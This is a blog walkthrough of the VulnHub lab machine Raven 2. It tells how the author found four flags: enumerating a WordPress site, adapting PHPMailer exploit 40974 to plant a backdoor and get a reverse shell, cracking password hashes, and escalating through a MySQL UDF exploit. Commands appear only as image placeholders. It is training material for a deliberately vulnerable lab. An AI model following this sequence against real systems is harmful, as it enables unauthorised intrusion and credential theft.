Raven: 2

[ vulnhub  boot2root  walkthrough  ]

Goal

4 flags

Download

https://www.vulnhub.com/entry/raven-2,269/

Walkthrough

change etc/hosts and run nmap
alt text

default 80, same as raven 1
alt text

dirb shows a wordpress instance (same as raven 1) and a vendor directory
alt text

default wordpress instances with 1 post

alt text

2 interesting notes from wpscan. shows a user michael (same as raven 1) and uploads folder is browsable
alt text alt text alt text

uploads folder shows flag 3, nicely done out of order on my part
alt text alt text

checking vendor directory, PATH file stands out due to modified date
alt text

PATH file holds flag 1
alt text

i admittedly moved on from here and tried to brute ssh/wordpress, but with no luck
and after much other enumeration couldn’t find anything

i did however find a form page at contact.php but initially thought nothing of it
alt text

looking back at the vendor folder though, it dawned on me that the contact page was probably related. so we know we’re using PHPmailer and we have the version being used
alt text

went to google and found what i was looking for
alt text

2nd google result 40974 looked promising, so we copy over to update
alt text

looking at the exploit we know we need to update the script, setup a listener, and run with python3
alt text

we update the target to be the contact.php url and change the backdoor to a new name rather than the original. then just update the attacker’s ip, the path to the backdoor file, and the backdoor file name
alt text

with our listener setup for a connection on 4444 we run the exploit
however we need to install ‘requests_toolbelt’ first
alt text

sending again, it works
alt text

we browse to the backdoor file and check our listener, reverse shell is working
alt text

looking around we find flag 2 just above the web directory like in raven 1
alt text

check the wordpress wp-config and we have mysql root password
alt text

we first escape the jailed shell so we can login to mysql properly
checking the database, we find password hashes for the wordpress users
alt text

we’re able to crack a hash with john
alt text

unfortunately it doesn’t allow system access, but rather wordpress as steven
we find flag 3 again
alt text

my normal enumeration includes running this script if possible to find ways for escalation. so we download, run with saving to file for review
alt text

rare to see the exploit suggestions be used for vulnhub vms, but after lots and lots of enumeration nothing was found and i started to investigate the suggestions. turns out the mysql exploit was a viable candidate given that we have mysql root credentials
alt text

looking at 1518, seems you can read a file as root if properly executed
alt text

we copy the exploit to prepare to transfer to the victim machine
slight error with copy and paste where a one should be a lowercase l
alt text

transfer the .so file to the victim machine
alt text

then we just follow the rest of the instructions with the goal of reading flag4.txt in root folder
alt text alt text

exploit worked and we have flag 4
alt text

Written on April 20, 2019
Share on: